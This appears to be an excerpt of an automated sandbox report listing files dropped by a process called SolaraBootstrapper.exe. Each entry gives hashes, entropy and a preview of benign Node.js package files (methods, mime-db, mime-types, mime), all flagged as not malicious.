                                                  SHA-512:06C8F5DE256A9300379A075CD55D9ACC9D9B29E7E913D08F964CD2CD347CC4D5D1A95B8ADC15936431AA67B6B39ADA2BC8C650CF292BAAB9BD8F2415722F0EE1
                                                  Malicious:false
                                                  Preview:/*!. * methods. * Copyright(c) 2013-2014 TJ Holowaychuk. * Copyright(c) 2015-2016 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module dependencies.. * @private. */..var http = require('http');../**. * Module exports.. * @public. */..module.exports = getCurrentNodeMethods() || getBasicNodeMethods();../**. * Get the current Node.js methods.. * @private. */..function getCurrentNodeMethods() {. return http.METHODS && http.METHODS.map(function lowerCaseMethod(method) {. return method.toLowerCase();. });.}../**. * Get the "basic" Node.js methods, a snapshot from Node.js 0.10.. * @private. */..function getBasicNodeMethods() {. return [. 'get',. 'post',. 'put',. 'head',. 'delete',. 'options',. 'trace',. 'copy',. 'lock',. 'mkcol',. 'move',. 'purge',. 'propfind',. 'proppatch',. 'unlock',. 'report',. 'mkactivity',. 'checkout',. 'merge',. 'm-search',. 'notify',. 'subscribe',. 'unsubscribe',. 'pat
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):947
                                                  Entropy (8bit):4.8785312207640015
                                                  Encrypted:false
                                                  SSDEEP:12:FvKB1XxR7CNZzZrdEQN54sUrUDeWfk/GaPjjPGWjVSYLZLPOyZiPjXy8enYMXwOx:FiB1XxVWbxVhUQeW6PBlZqy4y8e1LCU
                                                  MD5:8A9CBEAD0F83BF845207AD21534DFDFA
                                                  SHA1:93FAB7B874AFA4232986A2CAB9A7E900B5EAEE5A
                                                  SHA-256:1AEA21641646C87A589208A9363141CD2ACD503DB45C635F8217613C45837C09
                                                  SHA-512:E21EBB4897EE770DEBD4C3F1B0DCF52397FEDFA28B6BD7DA1C1CE8C371B170F7292D0E75828ECAD3A4B34D574DDAEE3955DA1797D8EE7AB75BA93C2BB7EF003E
                                                  Malicious:false
                                                  Preview:{. "name": "methods",. "description": "HTTP methods that node supports",. "version": "1.1.2",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)",. "TJ Holowaychuk <tj@vision-media.ca> (http://tjholowaychuk.com)". ],. "license": "MIT",. "repository": "jshttp/methods",. "devDependencies": {. "istanbul": "0.4.1",. "mocha": "1.21.5". },. "files": [. "index.js",. "HISTORY.md",. "LICENSE". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-cov": "istanbul cover node_modules/mocha/bin/_mocha -- --reporter dot --check-leaks test/",. "test-travis": "istanbul cover node_modules/mocha/bin/_mocha --report lcovonly -- --reporter spec --check-leaks test/". },. "browser": {. "http": false. },. "keywords": [. "http",. "methods". ].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):12581
                                                  Entropy (8bit):4.883495288508285
                                                  Encrypted:false
                                                  SSDEEP:192:YItJYGvMrnhiEafOY1+x+ve6Qq837C7jwB0Db:1403
                                                  MD5:183C405FF4F34B51DBD9C852CE358505
                                                  SHA1:1711A633B4C2C243E879695EE0DC6B359FC58D93
                                                  SHA-256:1E820A4AB3B25CC858EED9D2629DDB39BFD48BAB307BEDEC769308C258199AA6
                                                  SHA-512:5CD9760552D300C545DC5DE18170A3A0FDBFB799C70D487408ABB7884DA09A2575A693C3FFE2C9716B28BF46488A68F1A28437E630D04BCC1166E6E849923274
                                                  Malicious:false
                                                  Preview:1.52.0 / 2022-02-21.===================.. * Add extensions from IANA for more `image/*` types. * Add extension `.asc` to `application/pgp-keys`. * Add extensions to various XML types. * Add new upstream MIME types..1.51.0 / 2021-11-08.===================.. * Add new upstream MIME types. * Mark `image/vnd.microsoft.icon` as compressible. * Mark `image/vnd.ms-dds` as compressible..1.50.0 / 2021-09-15.===================.. * Add deprecated iWorks mime types and extensions. * Add new upstream MIME types..1.49.0 / 2021-07-26.===================.. * Add extension `.trig` to `application/trig`. * Add new upstream MIME types..1.48.0 / 2021-05-30.===================.. * Add extension `.mvt` to `application/vnd.mapbox-vector-tile`. * Add new upstream MIME types. * Mark `text/yaml` as compressible..1.47.0 / 2021-04-01.===================.. * Add new upstream MIME types. * Remove ambigious extensions from IANA for `application/*+xml` types. * Update primary extension to `.es` for
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1172
                                                  Entropy (8bit):5.19320181885572
                                                  Encrypted:false
                                                  SSDEEP:24:vXiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:vXiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:175B28B58359F8B4A969C9AB7C828445
                                                  SHA1:DAE0F982FFE71762045FC77C015C83BDA38C1C9E
                                                  SHA-256:CC1DFD4DAFA27271E8212CD3B274EEB3F262E40A6FDAB36DDC3F9696F706F58B
                                                  SHA-512:D9083A273B29FE4DFB0F89675D8EBFE7181C015A73BA38BFA4749E7667835C8E40F11F4D807DBB6248A335D668303174D0162432AE274A81D6A26C5F63720185
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014 Jonathan Ong <me@jongleberry.com>.Copyright (c) 2015-2022 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4091
                                                  Entropy (8bit):4.9073909713926644
                                                  Encrypted:false
                                                  SSDEEP:96:fCUAY18/16TqbM8fPBA8u7CG2WG0TARZX:fCDY18/16+Y8BA8u7CG2W1TSZX
                                                  MD5:15BED796DAB121B6C9168E4595F4F651
                                                  SHA1:3264750890E9D8FCFBA36CE72433DFE52CA37034
                                                  SHA-256:5CC863FD64953AFA39D206B510378B73E8C767C5FD124BB8D4017DB921C94855
                                                  SHA-512:7BCB6B463D7BE20668CCB3F5A93C60B9B5A48A6264AB4E27094A8C25F2EE362995829326222CA593E7C169E1E19D6BA0AAA4A78A55C6C23046D9391A80A7A927
                                                  Malicious:false
                                                  Preview:# mime-db..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-image]][node-url].[![Build Status][ci-image]][ci-url].[![Coverage Status][coveralls-image]][coveralls-url]..This is a large database of mime types and information about them..It consists of a single, public JSON file and does not include any logic,.allowing it to remain as un-opinionated as possible with an API..It aggregates data from the following sources:..- http://www.iana.org/assignments/media-types/media-types.xhtml.- http://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/conf/mime.types.- http://hg.nginx.org/nginx/raw-file/default/conf/mime.types..## Installation..```bash.npm install mime-db.```..### Database Download..If you're crazy enough to use this in the browser, you can just grab the.JSON file using [jsDelivr](https://www.jsdelivr.com/). It is recommended to.replace `master` with [a release tag](https://github.com/jshttp/mime-db/tags).as the JS
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):185882
                                                  Entropy (8bit):4.5222871698549705
                                                  Encrypted:false
                                                  SSDEEP:1536:WzZZ2YysmG8mlJo8mIp1hIK58RxoF5BD2yFAu7u8JJzoyn8B7Q/zaipLL1HSQtBK:qJN8RxoF5BD2y5Oy6eE
                                                  MD5:052E457B88D815C1792E1F8CE8509FC3
                                                  SHA1:341AF5A9607A11AE8A5845C2E36BC03B137EA684
                                                  SHA-256:85C8E1BA609079947C8DF83C092900AB0226E1D7B60E5E7105FB7DD701833263
                                                  SHA-512:4C629A1A452331A5568CB1BE6AA00EED31AE88EA8F4751C553A225DD4B3A0C32EFF30AB6DBDA44012FAFB0946E25AD11A91E6971424771D26920B26844093ADE
                                                  Malicious:false
                                                  Preview:{. "application/1d-interleaved-parityfec": {. "source": "iana". },. "application/3gpdash-qoe-report+xml": {. "source": "iana",. "charset": "UTF-8",. "compressible": true. },. "application/3gpp-ims+xml": {. "source": "iana",. "compressible": true. },. "application/3gpphal+json": {. "source": "iana",. "compressible": true. },. "application/3gpphalforms+json": {. "source": "iana",. "compressible": true. },. "application/a2l": {. "source": "iana". },. "application/ace+cbor": {. "source": "iana". },. "application/activemessage": {. "source": "iana". },. "application/activity+json": {. "source": "iana",. "compressible": true. },. "application/alto-costmap+json": {. "source": "iana",. "compressible": true. },. "application/alto-costmapfilter+json": {. "source": "iana",. "compressible": true. },. "application/alto-directory+json": {. "source": "iana",. "compressible": true. },. "application/alto-endpointcos
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):189
                                                  Entropy (8bit):5.005582537948525
                                                  Encrypted:false
                                                  SSDEEP:3:US9xIA8HvF99VmDDvUriFqI1cOmDDvmlc6WF3yFhWKZSsDp5cNtPFugAMzBbJw8u:Us89p+UeF3+mlcCFvZSQp6PbAuBg
                                                  MD5:911D3D2AE7BE42B05BA9275ED7722859
                                                  SHA1:F265D2B6A93EBABA408D00215A2BBA98158363AB
                                                  SHA-256:2CCEBF3D525708C915C6A86FFBB68E5023D34C9BC30B6B4021DB9EBBC6CA9ECC
                                                  SHA-512:828A467310483CC1BD852C555C9651E63CA05219B6F438C7FEED53C998A58FE7F00E3A011CF8C5C6760E5EB81F0755899838E7248707B416DA7CF31A818E58B3
                                                  Malicious:false
                                                  Preview:/*!. * mime-db. * Copyright(c) 2014 Jonathan Ong. * Copyright(c) 2015-2022 Douglas Christopher Wilson. * MIT Licensed. */../**. * Module exports.. */..module.exports = require('./db.json').
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1624
                                                  Entropy (8bit):4.833123617199433
                                                  Encrypted:false
                                                  SSDEEP:48:OUVbVWbtSvNI4oSuNWHRI5xGvDOXTo0MG03:1lcpe78bGvDOXTo0MZ3
                                                  MD5:12C5CD5CFA1D4F45AF207DB1715D4B70
                                                  SHA1:192A69685A32F1CCC5DF8A54EA0F117C48BD87F1
                                                  SHA-256:D03E37B915A050AF548D543F4E45FF5DE06EC767C19E745F18C431D9DC26B5BF
                                                  SHA-512:9344C3DF2A8B5D3ABF4F1A7BE8A7A3B885445D1355B294C69F855185BC1556F179AB4E2D8657B5CCC558494A382DB37DF57DFABB83574604C22F8DE5F7233808
                                                  Malicious:false
                                                  Preview:{. "name": "mime-db",. "description": "Media Type Database",. "version": "1.52.0",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)",. "Robert Kieffer <robert@broofa.com> (http://github.com/broofa)". ],. "license": "MIT",. "keywords": [. "mime",. "db",. "type",. "types",. "database",. "charset",. "charsets". ],. "repository": "jshttp/mime-db",. "devDependencies": {. "bluebird": "3.7.2",. "co": "4.6.0",. "cogent": "1.0.1",. "csv-parse": "4.16.3",. "eslint": "7.32.0",. "eslint-config-standard": "15.0.1",. "eslint-plugin-import": "2.25.4",. "eslint-plugin-markdown": "2.2.1",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "5.1.1",. "eslint-plugin-standard": "4.1.0",. "gnode": "0.1.2",. "media-typer": "1.1.0",. "mocha": "9.2.1",. "nyc": "15.1.0",. "raw-body": "2.5.0",. "stream-to-array": "2.3.0". },. "
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):8812
                                                  Entropy (8bit):4.796740600515603
                                                  Encrypted:false
                                                  SSDEEP:48:bFCF1A9RZAlC/CPVaiMC7J18RtYD2Z5iFjZuoLC455CrQ+fQfAKC9vlhY3LTgxOA:M0PadLksYxafKu4sKL0MwXtA
                                                  MD5:3B127A94F2041A03DE29B24E7B927E26
                                                  SHA1:7067CD942E355ECCDC41698AC10C282286F7631F
                                                  SHA-256:277B1CFC3E8FDB57E8B3FC9EBDEF37D108AC13572B60091CCCAF0E863167ADC0
                                                  SHA-512:B93983757D131D5F583F14F320FD7958FEEF3E44C3466D340E5D96B04D4A6BE8123FDD0CCA035CED36D501C18A1EC5D15195643454F41CA4E011743C92F4ED84
                                                  Malicious:false
                                                  Preview:2.1.35 / 2022-03-12.===================.. * deps: mime-db@1.52.0. - Add extensions from IANA for more `image/*` types. - Add extension `.asc` to `application/pgp-keys`. - Add extensions to various XML types. - Add new upstream MIME types..2.1.34 / 2021-11-08.===================.. * deps: mime-db@1.51.0. - Add new upstream MIME types..2.1.33 / 2021-10-01.===================.. * deps: mime-db@1.50.0. - Add deprecated iWorks mime types and extensions. - Add new upstream MIME types..2.1.32 / 2021-07-27.===================.. * deps: mime-db@1.49.0. - Add extension `.trig` to `application/trig`. - Add new upstream MIME types..2.1.31 / 2021-06-01.===================.. * deps: mime-db@1.48.0. - Add extension `.mvt` to `application/vnd.mapbox-vector-tile`. - Add new upstream MIME types..2.1.30 / 2021-04-02.===================.. * deps: mime-db@1.47.0. - Add extension `.amr` to `audio/amr`. - Remove ambigious extensions from IANA for `application/*+xm
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1167
                                                  Entropy (8bit):5.176199836532222
                                                  Encrypted:false
                                                  SSDEEP:24:voiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:voiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:BF1F9AD1E2E1D507AEF4883FFF7103DE
                                                  SHA1:F027AF3E61AF3880FD7F7B8BA9452A85DD215738
                                                  SHA-256:71F83C4C0621102A56D9853812777B85751BCE7E9726F686F5B056C1F8A4B0E6
                                                  SHA-512:A1A293EB0097FE87875F3BF908CC0B0EE8F15E995C68E984B6A24E247B2E954407D7941EA96ABD7FE002A1BDFB713FDFB0D3839D948A334603F05E644829F606
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014 Jonathan Ong <me@jongleberry.com>.Copyright (c) 2015 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3481
                                                  Entropy (8bit):5.0358475679922154
                                                  Encrypted:false
                                                  SSDEEP:48:KdC9vR5GpTfO6ezUuTdXMoNjhSBJzU2cWGi/FRJNKbkbAMG4GMGq1GqLRxzZf5Ja:eCEezUC15+zlzFRXK+BXLN1NFxZ2
                                                  MD5:DF3AEB2C1CB5F39D454082EADD3F2A5F
                                                  SHA1:E0593D2FBB7AF84598E75F65106685F8988A55D8
                                                  SHA-256:19E8EACA7DC91F7AD8E46114CE1689E4976368435F41A0039F48AAF27E5E6A20
                                                  SHA-512:93A470FC59AAA55177BD3FD2B067632BDC64A3254B359047CE8C278FEB15340EF552A6FCDD178FCD1026B161C693F4C84B426763A8881DCF02E74E1345C63940
                                                  Malicious:false
                                                  Preview:# mime-types..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][ci-image]][ci-url].[![Test Coverage][coveralls-image]][coveralls-url]..The ultimate javascript content-type utility...Similar to [the `mime@1.x` module](https://www.npmjs.com/package/mime), except:..- __No fallbacks.__ Instead of naively returning the first available type,. `mime-types` simply returns `false`, so do. `var type = mime.lookup('unrecognized') || 'application/octet-stream'`..- No `new Mime()` business, so you could do `var lookup = require('mime-types').lookup`..- No `.define()` functionality.- Bug fixes for `.lookup(path)`..Otherwise, the API is compatible with `mime` 1.x...## Install..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3663
                                                  Entropy (8bit):4.916300236559853
                                                  Encrypted:false
                                                  SSDEEP:96:whxEETkpRu3QqZti4/QyLS28/ldXDhDhsrG64ZyNUq2BRnY3g7Gxo:wh+0q4VLvITzhDhsS64oNUq2BRY3gYo
                                                  MD5:BF015BB6811AFC5C98E3E5F7072FDC79
                                                  SHA1:8D1F07AE6192C4DD6BC08A9247A91AF4A0A51ECA
                                                  SHA-256:8CFCCAAC306BEB650D60C7F069AE0F4B39D648F1E3914696B18C133AB33E6419
                                                  SHA-512:C2489DE379EFA61D68CEA7F1D4CE40593A48A86F62C8BE1DA099A4462DF0705C324CE2260B1998E9BDE494D2A8158C60D7517BE8448D27252379D675D99AE1BE
                                                  Malicious:false
                                                  Preview:/*!. * mime-types. * Copyright(c) 2014 Jonathan Ong. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var db = require('mime-db').var extname = require('path').extname../**. * Module variables.. * @private. */..var EXTRACT_TYPE_REGEXP = /^\s*([^;\s]*)(?:;|\s|$)/.var TEXT_TYPE_REGEXP = /^text\//i../**. * Module exports.. * @public. */..exports.charset = charset.exports.charsets = { lookup: charset }.exports.contentType = contentType.exports.extension = extension.exports.extensions = Object.create(null).exports.lookup = lookup.exports.types = Object.create(null)..// Populate the extensions/types maps.populateMaps(exports.extensions, exports.types)../**. * Get the default charset for a MIME type.. *. * @param {string} type. * @return {boolean|string}. */..function charset (type) {. if (!type || typeof type !== 'string') {. return false. }.. // TODO: use media-typer. var match = EXTRACT_TYPE_REGEXP.exec(ty
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1149
                                                  Entropy (8bit):4.834567403731111
                                                  Encrypted:false
                                                  SSDEEP:24:VVi1MxVzHbeEbenpLYAYuNCHRIZBlWSKByLt:VgCVvvbeCAYuNCHRIzUScy5
                                                  MD5:7AD9A6119E3173EA667F1409FEFBA992
                                                  SHA1:EE2C9EAE301358BF7D646B5B7EDE6C28FED4BF96
                                                  SHA-256:5053CC10259C3913AB6B6C8F13170A619C0D1836C1D9081238329A559FAFEB3A
                                                  SHA-512:E6B5A339B07D126BA1CB1F5DF3BE7CA36C7DC25E3F05B4A4CACA096132528E05D55200B41AE3D332B4B8F0A40ECADFFD90902167D8DD012990D800E5B1492443
                                                  Malicious:false
                                                  Preview:{. "name": "mime-types",. "description": "The ultimate javascript content-type utility.",. "version": "2.1.35",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Jeremiah Senkpiel <fishrock123@rocketmail.com> (https://searchbeam.jit.su)",. "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)". ],. "license": "MIT",. "keywords": [. "mime",. "types". ],. "repository": "jshttp/mime-types",. "dependencies": {. "mime-db": "1.52.0". },. "devDependencies": {. "eslint": "7.32.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.25.4",. "eslint-plugin-markdown": "2.2.1",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "5.2.0",. "eslint-plugin-standard": "4.1.0",. "mocha": "9.2.2",. "nyc": "15.1.0". },. "files": [. "HISTORY.md",. "LICENSE",. "index.js". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "lint": "eslint .",. "test": "mocha --reporter spe
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):9473
                                                  Entropy (8bit):5.151977506431236
                                                  Encrypted:false
                                                  SSDEEP:192:E78+V+LIIkamc73hF6k2ANjeKTLSSN14AbCecNjWjW3itNdeFFbHuTueUvu6WmzI:E4+IbT9FPJcJhS
                                                  MD5:90BAAC6A6F8D7E4A7DC0B15BB7A6CE65
                                                  SHA1:FB1894068FF1A400DD64FD5E5B5006D7561D7534
                                                  SHA-256:CB69AB3F4934B6970AABC64FDBCC37D8C53EE2E3010B00F37688CE017D212FF7
                                                  SHA-512:EF65CBD677D92E9070973E7D26F52DD4F53C89A2EDAE2683BD1F2413AA37381F1F1DE84169CD3232E61E6DB725A3814CDF5BCE84632C58473D8A368739F734F9
                                                  Malicious:false
                                                  Preview:# Changelog..## v1.6.0 (24/11/2017).*No changelog for this release.*..---..## v2.0.4 (24/11/2017).- [**closed**] Switch to mime-score module for resolving extension contention issues. [#182](https://github.com/broofa/node-mime/issues/182).- [**closed**] Update mime-db to 1.31.0 in v1.x branch [#181](https://github.com/broofa/node-mime/issues/181)..---..## v1.5.0 (22/11/2017).- [**closed**] need ES5 version ready in npm package [#179](https://github.com/broofa/node-mime/issues/179).- [**closed**] mime-db no trace of iWork - pages / numbers / etc. [#178](https://github.com/broofa/node-mime/issues/178).- [**closed**] How it works in brownser ? [#176](https://github.com/broofa/node-mime/issues/176).- [**closed**] Missing `./Mime` [#175](https://github.com/broofa/node-mime/issues/175).- [**closed**] Vulnerable Regular Expression [#167](https://github.com/broofa/node-mime/issues/167)..---..## v2.0.3 (25/09/2017).*No changelog for this release.*..---..## v1.4.1 (25/09/2017).- [**closed**] Iss
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1098
                                                  Entropy (8bit):5.1030320946441305
                                                  Encrypted:false
                                                  SSDEEP:24:b1zDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:b1zDaJHlxE35QHOs5exm3ogF5n
                                                  MD5:8E8EA2AD138CE468F8570A0EDBADEA65
                                                  SHA1:2E84853FB5F2711901B6ECB4A0B8FE4D419348FD
                                                  SHA-256:8F2658C03422C408B2B2CE4D151DECC3B1A6FD3D86E5CA9433777BCCDCDF75A2
                                                  SHA-512:D1106F3BC64EFADDDD19B11D495F8755261097FED95AC046ED5721F14B453B92E6A191CC13AA10232E7A59DF6CFB744DBE9B854D8F0D25C49B50337F62B21985
                                                  Malicious:false
                                                  Preview:The MIT License (MIT)..Copyright (c) 2010 Benjamin Thomas, Robert Kieffer..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARIS
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2119
                                                  Entropy (8bit):4.81814235364155
                                                  Encrypted:false
                                                  SSDEEP:48:4HdLngOwDLGvk+G5fhGajRenb7COHaWvm8fq+b8eGv8iHWeFl9k9:4kCofhKZhfqFe7Yl9k9
                                                  MD5:72CFB57E293629E482629AF74F4A92FD
                                                  SHA1:ED339E905C074B2391760EBB46D624BFBC1860FB
                                                  SHA-256:3D645CF326552BE680B89152865A5648E0DDAE647FFA02A325980A1CDBD774A5
                                                  SHA-512:D25E58AFD95288DDA1CC99A70ED7A1E82B2CCFD99EC951F026D2FB6074F59DEFC65060B105E085ED5D7E57F2C222F6FD8043932C3EC6E2B8D7B44F918F7B2403
                                                  Malicious:false
                                                  Preview:# mime..Comprehensive MIME type mapping API based on mime-db module...## Install..Install with [npm](http://github.com/isaacs/npm):.. npm install mime..## Contributing / Testing.. npm run test..## Command Line.. mime [path_string]..E.g... > mime scripts/jquery.js. application/javascript..## API - Queries..### mime.lookup(path).Get the mime type associated with a file, if no mime type is found `application/octet-stream` is returned. Performs a case-insensitive lookup using the extension in `path` (the substring after the last '/' or '.'). E.g...```js.var mime = require('mime');..mime.lookup('/path/to/file.txt'); // => 'text/plain'.mime.lookup('file.txt'); // => 'text/plain'.mime.lookup('.TXT'); // => 'text/plain'.mime.lookup('htm'); // => 'text/html'.```..### mime.default_type.Sets the mime type returned when `mime.lookup` fails to find the extension searched for. (Default is `application/octet-stream`.)
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:a /usr/bin/env node script, ASCII text executable
                                                  Category:dropped
                                                  Size (bytes):149
                                                  Entropy (8bit):4.846208246866977
                                                  Encrypted:false
                                                  SSDEEP:3:TKQWaHMPM2jEiOmQUUpuPw8oVaXt1RcxyTOlaWBLgXM6fm3:HWaH64VmQXuP1oo91Rcw6laWB33
                                                  MD5:D028184965062EF86CDCFE246753EF27
                                                  SHA1:4D5F01B12FE3FC18E06D871CE00D0264643200FA
                                                  SHA-256:F8691B2F01B77334E33BB6898D69C80DC05B18E4BE66760C476331A388F9CD27
                                                  SHA-512:7A878AA6D727C3A1494563E6CE4D9BDC53FABB512DF78FEE9EB5E761DE3CA9F2DD67ABB546F532C04DF52CBC848292CDCD93405CCD53F1080A54A26BFBB9D3D3
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:#!/usr/bin/env node..var mime = require('./mime.js');.var file = process.argv[2];.var type = mime.lookup(file);..process.stdout.write(type + '\n');..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2726
                                                  Entropy (8bit):4.938495719166568
                                                  Encrypted:false
                                                  SSDEEP:48:NW2vpIdykPw//LTKAF1FzpLMuWATNzOfscy2GrlZGaNyDoZIrGv:bfk6LtHFBMuFJUy/XyDoZ+Gv
                                                  MD5:2930E6CAAD95DFAD928D76FC1EB2E003
                                                  SHA1:F3CCFF5BA27AF0B9D39CC5C2F228F5AE3E276D13
                                                  SHA-256:A121A0B9E780E9AE349A26227A0D25C33EBAC2D52A85AAE5AFFA84BA0F53F16C
                                                  SHA-512:64C54D3B09B0340F21F5FA359DACDC4DF5BB180CB5BDE6EFB4FC0106B50BB1F4D1301D20D79441D8A9861338F75C94ED3AF12DC44E3291A4EEB0886DC661D46A
                                                  Malicious:false
                                                  Preview:var path = require('path');.var fs = require('fs');..function Mime() {. // Map of extension -> mime type. this.types = Object.create(null);.. // Map of mime type -> extension. this.extensions = Object.create(null);.}../**. * Define mimetype -> extension mappings. Each key is a mime-type that maps. * to an array of extensions associated with the type. The first extension is. * used as the default extension for the type.. *. * e.g. mime.define({'audio/ogg', ['oga', 'ogg', 'spx']});. *. * @param map (Object) type definitions. */.Mime.prototype.define = function (map) {. for (var type in map) {. var exts = map[type];. for (var i = 0; i < exts.length; i++) {. if (process.env.DEBUG_MIME && this.types[exts[i]]) {. console.warn((this._loading || "define()").replace(/.*\//, ''), 'changes "' + exts[i] + '" extension type from ' +. this.types[exts[i]] + ' to ' + type);. }.. this.types[exts[i]] = type;. }.. // Default extension is the first one we
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.564801621592961
                                                  Encrypted:false
                                                  SSDEEP:24:+RhWSZYq/d5ljbQxpJnH9Uw93CxV0Y4/CxKZdeMJfkR1f:+RsEYMb+nH9PxC96mONGjf
                                                  MD5:624EF11F91E60B224942FF81B13D10C6
                                                  SHA1:0779EA22AFE593A2EC0223D16E9CCB5D0E01E45F
                                                  SHA-256:F6A871D6AB40D2F2945D626A4D75DA2FCE78A35737C0870A0A4DA9BEE43F9D4E
